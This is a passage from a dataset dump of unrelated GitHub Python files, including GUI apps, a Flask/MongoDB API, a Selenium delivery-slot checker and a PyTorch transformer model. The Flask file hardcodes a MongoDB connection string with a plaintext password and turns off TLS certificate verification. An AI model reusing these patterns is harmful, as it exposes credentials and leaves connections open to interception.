Erdós-Renyi')\n\n g3 = make_graph(3)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g3, \"Fig 3 a).png\", self.ax21)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g3, \"Fig 3 b).png\", self.ax22)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g3, \"Fig 3 c).png\", self.ax23)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g3, \"Fig 3 d).png\", self.ax24)\n self.graficar(0.05, 0.4, 0.3, 0, 0, g3, \"Fig 3 e).png\", self.ax25)\n self.graficar(0.05, 0.4, 0.4, 0, 0, g3, \"Fig 3 f).png\", self.ax26)\n print('Graficas de Wats-Strogatz')\n\n g4 = make_graph_db('facebook.txt', 'Facebook')\n self.graficar(0.05, 0.1, 0.1, 0, 0, g4, \"Fig 4 a).png\", self.ax31)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g4, \"Fig 4 b).png\", self.ax32)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g4, \"Fig 4 c).png\", self.ax33)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g4, \"Fig 4 d).png\", self.ax34)\n self.graficar(0.05, 0.4, 0.3, 0, 0, g4, \"Fig 4 e).png\", self.ax35)\n self.graficar(0.05, 0.8, 0.2, 0, 0, g4, \"Fig 4 f).png\", self.ax36)\n print('Graficas de Facebook')\n\n self.canvas.draw()\n\n def graficar(self, if_seed, profile, threshold, p, a, g, name, pl):\n m1, t1, it1 = make_pt_graph_simulation(\n if_seed, profile, threshold, p, a, g)\n m2, t2 = make_p_graph_simulation(if_seed, profile, p, a, g)\n m3, t3 = make_t_graph_simulation(if_seed, 
threshold, p, a, g)\n viz = DiffusionTrendComparison([m1, m2, m3], [t1, t2, t3], plt=pl)\n lol = viz.plot(filename=name)\n return lol\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"ChepeAicrag/Simulacion","sub_path":"App_Gui.py","file_name":"App_Gui.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9550086519","text":"class PlantFileService:\n '''Class is repsonsible for creating and reading data from a file'''\n\n def __init__(self, fileService, dateTime):\n try:\n self._fileService = fileService\n self._dateTime = dateTime\n except Exception as e:\n raise e\n \n def getLastWatered(self, plantName):\n '''gets the last watered response based on the plant name'''\n try:\n result = self._fileService.read(plantName + \"_last_watered.txt\")\n if result == \"\":\n return \"NEVER!\"\n \n return result\n except:\n return \"NEVER!\"\n\n def writePlantWatered(self, plantName):\n '''writes that the plant was watered to the output location'''\n self._fileService.write(plantName + \"_last_watered.txt\", \"Last watered {}\".format(self._dateTime.datetime.now()))\n ","repo_name":"swcarter007/AutoWater","sub_path":"Services/PlantFileService.py","file_name":"PlantFileService.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3974200625","text":"\"\"\"\n2) Create the following Routes in your Flask Application (Use the data you persisted in Module 9)\n\nDefault Route (\"/\") - Go to a simple html template page that tells about your data.\nGET (\"/item\") - Will return UP TO 1000 items from your data.\nGET (\"/item/\") - Will return a single item from your data, by ID. If you data does not have a unique identifier then please let me know and I will help you get one added.\nDELETE(\"/item/\") - Will delete a single item (again, you will need a unique column name)\nPOST (\"/item\") - As opposed to GET, POST will create a new item in your database. 
The body of the request will contain the item to be added.\n\nI am having hard time with the CSS\n\nQuestions for Mckelly:\n1)Css not working\n2)Interactive HTML\n3)\n\n\"\"\"\n\nfrom pymongo import MongoClient\nfrom flask import Flask, g, render_template, abort, request\nfrom bson.json_util import dumps\nfrom bson.objectid import ObjectId\nimport ssl\nimport json\nimport dns\nimport os\nimport pprint\n\n# Configure the connection\nclient = MongoClient(\"mongodb+srv://jaceiverson:vufspUcCvsFX2yCT@test-ol2kq.mongodb.net/test?retryWrites=true\",ssl=True, ssl_cert_reqs=ssl.CERT_NONE)\ndb=client['Test']\nchamp=db['League Champions']\nchampionFile={}\n\n#puts all the champions into a dictionary locally\nfor x in champ.find():\n championFile[str([x['id']][0])]=x\n\n# Setup Flask\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n\n\n\n@app.route('/', methods=['GET'])\ndef hello():\n return render_template('landing.html')\n\n@app.route('/item', methods=['GET'])\ndef allItems():\n allChamps=champ.find()\n return dumps(allChamps), 200\n\n\n@app.route('/item/', methods=['GET'])\ndef oneItem(id):\n\n book = champ.find_one({\"id\": str(id)})\n\n return dumps(book), 200\n\n@app.route('/item//stats', methods=['GET'])\ndef oneChampStats(id):\n\n book = champ.find_one({\"id\": str(id)})\n stats=book['stats']\n return dumps(stats), 200\n\n\n@app.route('/item/', methods=['DELETE'])\ndef removeOneItem():\n pass\n\n@app.route('/item', methods=['POST'])\ndef postOneItem():\n pass\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"jaceiverson/Final-Riot","sub_path":"jaceAPIforMOD10.py","file_name":"jaceAPIforMOD10.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24248394564","text":"import bs4\n\nfrom selenium import webdriver\n\nimport sys\nimport time\n\nimport subprocess\n\n\ndef getWFSlot(productUrl):\n driver = webdriver.Chrome(\"D:\\Program Files (x86)\\Python\\Lib\\site-packages\\chromedriver_binary\\chromedriver.exe\")\n driver.get(productUrl) \n html = driver.page_source\n soup = bs4.BeautifulSoup(html)\n time.sleep(60)\n no_open_slots = True\n\n duration = 5000\n #milliseconds\n freq = 440\n\n\n while no_open_slots:\n driver.refresh()\n print(\"refreshed\")\n html = driver.page_source\n soup = bs4.BeautifulSoup(html)\n time.sleep(4)\n\n slot_pattern = 'Next available'\n try:\n next_slot_text = soup.find('h4', class_ ='ufss-slotgroup-heading-text a-text-normal').text\n print(\"text: %s\"%next_slot_text)\n if slot_pattern in next_slot_text:\n print('SLOTS OPEN!')\n subprocess.call([\"afplay\", \"music.wav\"])\n time.sleep(60000)\n except AttributeError:\n i = 0\n\n try:\n no_slot_pattern = 'No delivery windows available. 
New windows are released throughout the day.'\n no_slot_text = soup.find('h4', class_ ='a-alert-heading').text\n print(\"No slot: %s\"%no_slot_text)\n if no_slot_pattern == no_slot_text:\n print(\"NO SLOTS!\")\n else:\n subprocess.call([\"afplay\", \"music.wav\"])\n except AttributeError: \n print('SLOTS OPEN!')\n subprocess.call([\"afplay\", \"music.wav\"])\n time.sleep(60000)\n\n\ngetWFSlot('https://www.amazon.com/gp/buy/shipoptionselect/handlers/display.html?hasWorkingJavascript=1')\n\n\n","repo_name":"haodehen2020/WholeFoodDelivery","sub_path":"whole_foods_delivery_ios.py","file_name":"whole_foods_delivery_ios.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16419055412","text":"#Developer: Tyler Smith\r\n#Date: 11.06.16\r\n#Purpose: Gui interface for currency object\r\n# that converts American currency\r\n# to other foreign currencys.\r\n\r\nfrom tkinter import * # Import tkinter library \r\n\r\nfrom currencyObject import * # Import unitObject library\r\n\r\nclass currCalc(currencyCalc): # Clone currencyCalc class \r\n pass\r\n\r\nclass currencyApp(Tk): \r\n def __init__(self): # Constructor for GUI class\r\n Tk.__init__(self) # \r\n self.addTitle() # Display title on GUI\r\n self.addAllLabels() # Display text output on GUI\r\n self.addAllInputs() # Display text fields where data is in on GUI\r\n self.addButton() # Put button on GUI\r\n\r\n # Put title on GUI \r\n def addTitle(self):\r\n Label(self, text = \"Currency Calculator\", font =\r\n (\"Helvetica\", \"16\", \"bold italic\")).grid(columnspan = 2)\r\n Label(self, text = \"\", font =\r\n (\"Helvetica\", \"16\", \"bold italic\")).grid(columnspan = 2)\r\n\r\n # Put text output on GUI where data will be displayed next to\r\n def addAllLabels(self):\r\n Label(self, text = \" American Dollar(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 4, column = 0)\r\n Label(self, text = \" \", font =\r\n (\"Helvetica\", \"16\")).grid(row = 7, column = 0)\r\n Label(self, text = \" Canadian Dollar(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 8, column = 0)\r\n Label(self, text = \" British Pound(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 9, column = 0)\r\n Label(self, text = \" Euro(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 10, column = 0) \r\n Label(self, text = \" Chinese Yuan(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 11, column = 0)\r\n Label(self, text = \" Mexican Peso(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 12, column = 0)\r\n Label(self, text = \" Bitcoin(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 13, column = 0)\r\n Label(self, text = \" \", font =\r\n (\"Helvetica\", \"16\")).grid(row = 14, column = 0)\r\n \r\n # Labels where data can change, but can't be entered in by user\r\n self.lblCanDollar = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblCanDollar.grid(row = 8, column = 1, sticky = \"we\")\r\n\r\n self.lblBritPound = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblBritPound.grid(row = 9, column = 1, sticky = \"we\")\r\n\r\n self.lblEuro = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblEuro.grid(row = 10, column = 1, sticky = \"we\")\r\n\r\n self.lblChinYuan = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblChinYuan.grid(row = 11, column = 1, sticky = \"we\")\r\n \r\n self.lblMexPeso = Label(self, bg = \"#fff\", anchor = \"w\", relief = 
\"groove\")\r\n self.lblMexPeso.grid(row = 12, column = 1, sticky = \"we\")\r\n\r\n self.lblBitcoin = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblBitcoin.grid(row = 13, column = 1, sticky = \"we\") \r\n \r\n # Put text inputs on screen for user to enter data in\r\n def addAllInputs(self):\r\n self.txtUSDollar = Entry(self) \r\n self.txtUSDollar.grid(row = 4, column = 1)\r\n\r\n # Put calculate button on GUI\r\n def addButton(self):\r\n self.btnCalc = Button(self, text = 'Currency Calculate', font =\r\n (\"Helvetica\", \"14\"))\r\n self.btnCalc.grid(row = 15, columnspan = 2)\r\n self.btnCalc[\"command\"] = self.calculate\r\n\r\n # Event that is triggered when calculate button is pushed\r\n def calculate(self):\r\n currObject = currCalc(float(self.txtUSDollar.get()))\r\n\r\n # Fill data fields according to what the user entered\r\n self.lblCanDollar[\"text\"] = (\"%.2f\" %currObject.getCanDollar())\r\n self.lblBritPound[\"text\"] = (\"%.2f\" %currObject.getBritPound())\r\n self.lblEuro[\"text\"] = (\"%.2f\" %currObject.getEuro())\r\n \r\n self.lblChinYuan[\"text\"] = (\"%.2f\" %currObject.getChinYuan())\r\n self.lblMexPeso[\"text\"] = (\"%.2f\" %currObject.getMexPeso())\r\n self.lblBitcoin[\"text\"] = (\"%.4f\" %currObject.getBitcoin()) \r\n\r\ndef main():\r\n myGui = currencyApp() # Instantiate myGUI object to begin building GUI \r\n myGui.mainloop()\r\n\r\n#Run main function\r\nif(__name__ == \"__main__\"):\r\n main() \r\n\r\n","repo_name":"tylersmithSD/Multipurpose_Calculator-Python","sub_path":"currencyApplication.py","file_name":"currencyApplication.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28275571950","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport configparser\nimport sys\nfrom pathlib import Path # nueva forma de trabajar con rutas\nfrom typing import NoReturn, List\n\nfrom PyQt5 import QtWidgets\nfrom app.views.ui.preferencias_ui import Ui_Dialog\n\nimport app.controller.Controller as Controller\nimport app.utils.settings\nfrom app import logger\nfrom app.models.model_preferences import Preferences\nfrom app.models.model_query import Query\nfrom app.utils.settings import PATH_FILE_CONFIG, write_config\n\n\nclass Preferencias(QtWidgets.QDialog):\n def __init__(self, parent: object = None) -> NoReturn:\n QtWidgets.QWidget.__init__(self, parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.other = 'otra' # campo otra del formulario\n self.state_ok = 'Ok' # estado inicial\n self.state_cancel = 'Cancelado' # final\n self.state_current = self.state_ok # actual\n\n self.setWindowTitle('Preferencias de configuracion')\n self.ui.tabWidget.setCurrentIndex(0)\n\n self.configuraciones: List[Preferences] = list()\n self.preferences_actual: Preferences = Preferences()\n self.initials_operations()\n\n # recogo todos los dias de la caja y le paso el indice del dia en el que sale\n all_items = [self.ui.BoxId.itemText(i) for i in range(self.ui.BoxId.count())]\n logger.info(all_items)\n try:\n self.ui.BoxId.setCurrentIndex(all_items.index(str(app.utils.settings.DATABASE_ID)))\n except ValueError as e:\n logger.debug(e)\n if len(all_items) == 1: # si solo hay 1 es 'otra'\n self.ui.BoxId.setCurrentIndex(all_items.index(self.other))\n else:\n # si da error por algun motivo pongo el primero\n self.ui.BoxId.setCurrentIndex(all_items.index('1'))\n\n self.common_processes()\n\n self.ui.pushButton.clicked.connect(self.search_directory)\n 
self.ui.BoxId.activated.connect(self.common_processes)\n\n self.ui.pushButtonAplicar.clicked.connect(self.apply_data)\n self.ui.pushButtonCerrar.clicked.connect(self.cancel)\n self.ui.pushButtonAceptar.clicked.connect(self.accept_data)\n\n def initials_operations(self) -> NoReturn:\n self.get_all_notifications()\n self.list_id()\n\n def search_directory(self) -> NoReturn:\n \"\"\"\n Se encarga de coger la ruta en la que vamos a guardar el fichero, en este caso solo buscamos directorios,\n y establecemos que la ruta raiz sea el escrotorio, que se establece en el init\n \"\"\"\n # filenames = QtGui.QFileDialog.getOpenFileName()\n # noinspection PyArgumentList\n filenames: str = QtWidgets.QFileDialog.getExistingDirectory(\n parent=self, caption=\"Select Directory\", directory=self.ui.lineRuta.text(),\n QFileDialog_Options=QtWidgets.QFileDialog.ShowDirsOnly | QtWidgets.QFileDialog.DontResolveSymlinks)\n\n if filenames is not None:\n # if not (filenames.isNull()): en python 3 filenames ya no es un\n # QString sino str\n self.ui.lineRuta.setText(filenames)\n\n def get_all_notifications(self) -> NoReturn:\n \"\"\"\n\n \"\"\"\n response_query: Query = Controller.get_preferences()\n self.configuraciones = response_query.response\n # self.configuraciones = conection_sqlite(self.db, query, True)\n if not response_query.is_empty():\n self.preferences_actual = self.configuraciones[0]\n else:\n logger.info('Information not obtained')\n\n def list_id(self) -> NoReturn:\n \"\"\"\n\n \"\"\"\n lista: list = [str(i.id) for i in self.configuraciones]\n # for i in self.configuraciones:\n # lista.append(str(i.id))\n self.ui.BoxId.clear()\n self.ui.BoxId.addItems(lista)\n self.ui.BoxId.addItem(self.other)\n\n def get_configuration(self) -> NoReturn:\n \"\"\"\n \"\"\"\n for i in self.configuraciones:\n if str(self.ui.BoxId.currentText()) == str(i.id):\n self.preferences_actual = i\n if self.ui.BoxId.currentText() == self.other:\n self.preferences_actual = Preferences()\n\n def common_processes(self) -> NoReturn:\n \"\"\"\n \"\"\"\n self.get_configuration()\n self.insert_serie()\n\n def apply_data(self) -> bool:\n preferences: Preferences = Preferences()\n preferences.id = int(self.ui.BoxId.currentText())\n preferences.url_feed = self.ui.lineNewpct.text()\n preferences.url_feed_vose = self.ui.lineShowrss.text()\n preferences.path_download = Path(self.ui.lineRuta.text())\n\n if preferences.id == self.other:\n logger.info('insert')\n Controller.insert_preferences(preferences)\n self.initials_operations()\n else:\n Controller.update_preferences(preferences)\n\n config = configparser.ConfigParser()\n config.read(PATH_FILE_CONFIG)\n config['CONFIGURABLE']['DATABASE_ID'] = str(preferences.id)\n write_config(config)\n app.utils.settings.DATABASE_ID = preferences.id\n\n return True\n\n def insert_serie(self) -> NoReturn:\n \"\"\"\n \"\"\"\n self.ui.lineNewpct.setText(self.preferences_actual.url_feed)\n self.ui.lineShowrss.setText(self.preferences_actual.url_feed_vose)\n self.ui.lineRuta.setText(str(self.preferences_actual.path_download))\n\n def cancel(self) -> NoReturn:\n \"\"\"\n Establece el estado actual en cancelado para retornar None y ejecuta reject\n \"\"\"\n self.state_current = self.state_cancel\n self.reject()\n\n def accept_data(self) -> NoReturn:\n \"\"\"\n Boton Aceptar, primero aplicas los datos, si retorna True, cierra la ventana\n \"\"\"\n if self.apply_data():\n self.accept()\n\n @staticmethod\n def get_data(parent: object = None) -> NoReturn:\n dialog = Preferencias(parent)\n dialog.exec_()\n\n\ndef 
main():\n qapp = QtWidgets.QApplication(sys.argv)\n Preferencias.get_data()\n return qapp\n\n\n# revisar cuando pongo otra, poner insetar en vez de otra\nif __name__ == '__main__':\n main()\n","repo_name":"procamora/series_manager","sub_path":"app/views/preferencias.py","file_name":"preferencias.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"20213058309","text":"import pymongo\r\nfrom tkinter import *\r\ndef i_student_function():\r\n root = Tk()\r\n root.title(\"Insert Into Student\")\r\n root.geometry(\"700x300\")\r\n def insertstudent():\r\n client = pymongo.MongoClient(\"mongodb://localhost:27017\")\r\n db = client.student_lib_DB\r\n collection = db.student\r\n label = Label(root, text=\"\\nInserted data successfully\\n\")\r\n label.grid(row=5,column=3)\r\n studentId = e1.get()\r\n studentName = e2.get()\r\n studentAge = e3.get()\r\n studentCountry = e4.get()\r\n db.student.insert_one(\r\n {\r\n \"std_id\":studentId,\r\n \"name\":studentName,\r\n \"age\":studentAge,\r\n \"country\":studentCountry\r\n })\r\n \r\n \r\n l1= Label(root, text=\"Student Id\")\r\n l2= Label(root, text=\"Student Name\")\r\n l3= Label(root, text=\"Student Age\")\r\n l4= Label(root, text=\"Student Country\")\r\n\r\n l1.grid(row=0, sticky=E)\r\n l2.grid(row=1, sticky=E)\r\n l3.grid(row=2, sticky=E)\r\n l4.grid(row=3, sticky=E)\r\n\r\n e1 = Entry(root)\r\n e2 = Entry(root)\r\n e3 = Entry(root)\r\n e4 = Entry(root)\r\n\r\n e1.grid(row=0, column=1)\r\n e2.grid(row=1, column=1)\r\n e3.grid(row=2, column=1)\r\n e4.grid(row=3, column=1)\r\n\r\n b1= Button(root, text='Insert', command=insertstudent)\r\n\r\n b1.grid(row=5, column=1, sticky=W, pady=4)\r\n\r\n root.mainloop()\r\n\r\n\r\n","repo_name":"shahprashant030/Student-Library-Management","sub_path":"Student Library Management/insertstudent.py","file_name":"insertstudent.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1247533332","text":"import unittest\nfrom solution import Solution, TreeNode\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test_1(self):\n root = TreeNode.fromList([3,9,20,None,None,15,7])\n \n result = self.solution.averageOfLevels(root)\n expected = [3.0000, 14.5, 11.0]\n self.assertEqual(result, expected)\n \nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"djeriko/leetcode","sub_path":"637_average_of_levels_in_binary_tree/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74004184328","text":"import numpy as np\r\nimport randInitializeWeights as diw\r\nimport nnCostFunction as ncf\r\nimport computeNumericalGradient as cng\r\n\r\n\r\ndef check_nn_gradients(lmd):\r\n # np.set_printoptions(precision=20)\r\n input_layer_size = 3\r\n hidden_layer_size = 5\r\n num_labels = 3\r\n m = 5\r\n # We generatesome 'random' test data\r\n theta1 = diw.randInitializeWeights(input_layer_size, hidden_layer_size)\r\n theta2 = diw.randInitializeWeights(hidden_layer_size, num_labels)\r\n\r\n # Reusing debugInitializeWeights to genete X\r\n X = diw.randInitializeWeights(input_layer_size - 1, m)\r\n X1 = np.hstack((np.ones((X.shape[0])).reshape(X.shape[0], 1), X))\r\n y = 1 + np.mod(np.arange(1, m + 1), num_labels)\r\n\r\n # Unroll parameters\r\n nn_params = 
np.concatenate([theta1.flatten(), theta2.flatten()])\r\n\r\n def cost_func(p):\r\n return ncf.ex3_nn(X, y, p, num_labels, X1, hidden_layer_size, lmd)\r\n\r\n\r\n cost, grad = cost_func(nn_params)\r\n numgrad = cng.compute_numerial_gradient(cost_func, nn_params)\r\n print(np.c_[grad, numgrad])\r\n\r\n","repo_name":"hellobigorange/my_own_machineLearning","sub_path":"my_ex4/checkNNGradients.py","file_name":"checkNNGradients.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"44750216019","text":"n = int(input())\narr = list(map(int, input().split()))\n\n\ndef findIndex(i):\n start = 0\n end = len(a) - 1\n while end >= start:\n mid = (start + end) // 2\n if i < a[mid]:\n end = mid - 1\n elif i > a[mid]:\n start = mid + 1\n else:\n return mid\n return start\n\n\na = [0] # 최장 수열을 저장할 array\nfor i in arr:\n if i > a[-1]:\n a.append(i) # 쌓여가는 최장수열의 마지막 값보다 클 경우, a에 추가\n elif i < a[-1]:\n ind = findIndex(i) # 작을 경우, 얘가 대체할 수 있는 a의 자리를 찾아서\n # (같은 값이나 i보다 작은 수 중 가장 차이가 적은 수의 자리)\n a[ind] = i # 해당 인덱스에 i값을 집어넣는다.\n# 실제 최장 수열을 찾을 필요가 없이 최장 수열의 길이만 출력하면 되기 때문에.\nprint(len(a)-1)\n","repo_name":"Joanne19-drive/python_algorithm","sub_path":"baekjoon/12015.py","file_name":"12015.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12960901702","text":"import torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\nimport math\nimport torch\n\n\n# pre_trained = torch.hub.load(\n# 'huggingface/pytorch-transformers', 'model', 'bert-base-uncased')\n\n\nclass Embed(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embed, self).__init__()\n # self.lut = pre_trained.embeddings.word_embeddings\n self.lut = nn.Embedding(vocab, d_model)\n self.lut.weight.data.uniform_(-0.1, .1)\n # v_trained = pre_trained.embeddings.word_embeddings.weight.shape[0]\n # self.lut.weight.data[0:v_trained] = pre_trained.embeddings.word_embeddings.weight\n self.d_model = d_model\n\n # for param in self.lut.parameters():\n # param.requires_grad = False\n\n # handle subword encodings\n def forward(self, x):\n return self.lut(x) * math.sqrt(self.d_model)\n\n\nclass TransformerSentiment(nn.Module):\n def __init__(self, vocab, pos, d_embed, hidden_d, layers, nhead=2, dropout=.2):\n super(TransformerSentiment, self).__init__()\n\n self.embed = Embed(d_embed, vocab)\n self.pos = Embed(d_embed, pos)\n\n self.pos_embed = PositionalEncoding(\n d_embed, max_len=150, dropout=dropout)\n\n enc_layer = nn.TransformerEncoderLayer(\n d_model=d_embed, nhead=nhead, dim_feedforward=hidden_d, dropout=dropout)\n self.transformer = nn.TransformerEncoder(enc_layer, num_layers=layers)\n\n self.fc_start = nn.Linear(150*d_embed, 150)\n self.fc_end = nn.Linear(150*d_embed, 150)\n\n self.mask = None\n\n initrange = 0.1\n\n self.fc_start.bias.data.zero_()\n self.fc_start.weight.data.uniform_(-initrange, initrange)\n self.fc_end.bias.data.zero_()\n self.fc_end.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, seq, pos):\n\n if self.mask is None or self.mask.shape != seq.shape:\n self.mask = torch.zeros(seq.shape).to(seq.device)\n\n seq_mask = self.mask == seq\n emb = self.embed(seq)\n pos = self.pos(pos)\n\n seq = self.pos_embed(emb + pos).transpose(0, 1)\n seq = self.transformer(\n seq, src_key_padding_mask=seq_mask).transpose(0, 1)\n B = seq.shape[0]\n S = seq.shape[1]\n\n # start = 
self.fc_start(self.c_act(self.conv_start(seq.permute(0,2,1))).view(B, -1))\n # end = self.fc_end(self.c_act(self.conv_end(seq.permute(0,2,1))).view(B, -1))\n\n start = self.fc_start(seq.reshape(B, -1))\n end = self.fc_end(seq.reshape(B, -1))\n return start, end\n\n# Retrieved from pytorch website\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout=0.0, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(\n 0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.shape[0], :]\n return self.dropout(x)\n\nclass SmoothingLoss(nn.Module):\n def __init__(self, smoothing=0.0, n_classes=150):\n super(SmoothingLoss, self).__init__()\n self.confidence = 1.0 - smoothing\n self.smoothing = smoothing\n self.cls = n_classes\n self.dim = 1\n\n def forward(self, pred, target, selection):\n pred = pred.log_softmax(dim=self.dim)\n with torch.no_grad():\n # true_dist = pred.data.clone()\n true_dist = torch.zeros_like(pred)\n true_dist.fill_(self.smoothing / (self.cls - 1))\n true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)\n true_dist = true_dist * (selection != -1).float()\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))\n\nclass Loss(nn.Module):\n def __init__(self, smoothing=0.0, n_classes=150):\n super(Loss, self).__init__() \n self.start_loss = SmoothingLoss(smoothing=smoothing, n_classes=n_classes)\n self.end_loss = SmoothingLoss(smoothing=smoothing, n_classes=n_classes)\n\n def forward(self, y_hat_start, start, y_hat_end, end, selection):\n return (self.start_loss(y_hat_start, start, selection) + self.end_loss(y_hat_end, end, selection)) * 0.5\n\n","repo_name":"ammuh/twitter-sentiment-extraction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14337393442","text":"'''\n@Author:Sailesh Chauhan\n@Date:2021-06-08\n@Last Modified by:Sailesh Chauhan\n@Last Modified time:2021-06-09\n@Title: Create set Add Element Iterate through set element.\n'''\n\n#Importing logConfig for error logging\nimport logconfig\nimport logging\n\ndef create_set():\n '''\n Description:\n Parameters:\n Returns:\n '''\n try:\n defaultSet=set()\n choice=''\n print(\"You can enter any value in set\")\n while(choice.lower()!='q'):\n userValue=input(\"Enter value to add in set\\n\")\n defaultSet.add(userValue)\n print(\"Do you want to add more values \\nPress C to continue\\nQ to stop\\n\")\n choice=input(\"Enter choice\\n\")\n return defaultSet\n except Exception as ex:\n logging.error(ex)\n\n\ndef iterate_set(set=create_set()):\n '''\n Description:\n Parameters:\n Returns:\n '''\n try:\n for eachSetItem in set:\n print(eachSetItem)\n except Exception as ex:\n logging.error(ex)\n\niterate_set()\n","repo_name":"saileshchauhan/PythonProgram","sub_path":"DataStructure/Sets/1_Sets_create_add_iterate.py","file_name":"1_Sets_create_add_iterate.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32470540959","text":"from tkinter import ttk\n\nfrom 
matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\n\nimport numpy as np\n\nfrom display import ImageDisplay, ObjectDisplay\n\nclass CanvasFullImage():\n\n def __init__(self, frame_container, controller = None):\n self.controller = controller\n\n # Configure layout of frame\n frame_container.columnconfigure(0, weight = 1)\n frame_container.rowconfigure(1, weight = 1)\n\n # Initialize figure and adjust subplot area to maximize display\n fig = Figure(facecolor = [0.15, 0.15, 0.16])\n fig.subplots_adjust(left = 0.0, bottom = 0.0, \n right = 1.0, top = 1.0, \n wspace = 0, hspace = 0)\n\n # Initialize subplot area, without axis\n axis_img = fig.add_subplot(111)\n axis_img.axis('off')\n\n # Add canvas to the figure within the frame of the window\n canvas = FigureCanvasTkAgg(fig, master = frame_container)\n frame_canvas = canvas.get_tk_widget()\n frame_canvas.grid(row = 1, column = 0, sticky = 'nsew')\n\n # Add matplotlib toolbar to the figure within the frame of the window\n frame_itoolbar = ttk.Frame(frame_container)\n frame_itoolbar.grid(row = 0, column = 0, sticky = 'nsew')\n t_img = NavigationToolbar2Tk(canvas, frame_itoolbar)\n\n # Store canvas and axis image in object\n self.canvas = canvas\n self.axis_img = axis_img\n\n def clear_axis(self):\n\n # clear axis\n self.axis_img.clear() \n # Take off axis\n self.axis_img.axis('off')\n\n def clear_showimage(self, img, **kwargs):\n\n # Get image axis, colormap and channels for display\n img_axis = kwargs.get('axis_img', self.axis_img)\n\n # Get the display settings from the app. This only works for the main display\n # If the dislay is from a different window, there are no settings, and they need to be specified\n display_settings = ['cmap', 'channel']\n try:\n display_settings[0] = self.controller.appdata_colormap['channels']\n except AttributeError as e:\n display_settings = [None, None]\n else:\n display_settings[1] = self.controller.appdata_channels['current'].get()\n\n # Get colormap options\n cmap_options = kwargs.get('cmap', display_settings[0])\n # Get current channel\n current_channel = kwargs.get('channel', display_settings[1])\n\n # Set the image to the current channel and correct the colormap if necessary\n if current_channel != 0:\n try:\n img = img[:,:,current_channel - 1]\n except IndexError as e:\n if type(cmap_options) == str:\n cmap_options = [None, cmap_options]\n\n # Clear the previous shown image and show new image, keep displayed image object\n try:\n self.s_img.remove()\n except (AttributeError, ValueError):\n pass\n \n self.s_img = ImageDisplay.show_image(img, img_axis, cmap_options, current_channel)\n self.canvas.draw()\n\n # If required, update the current 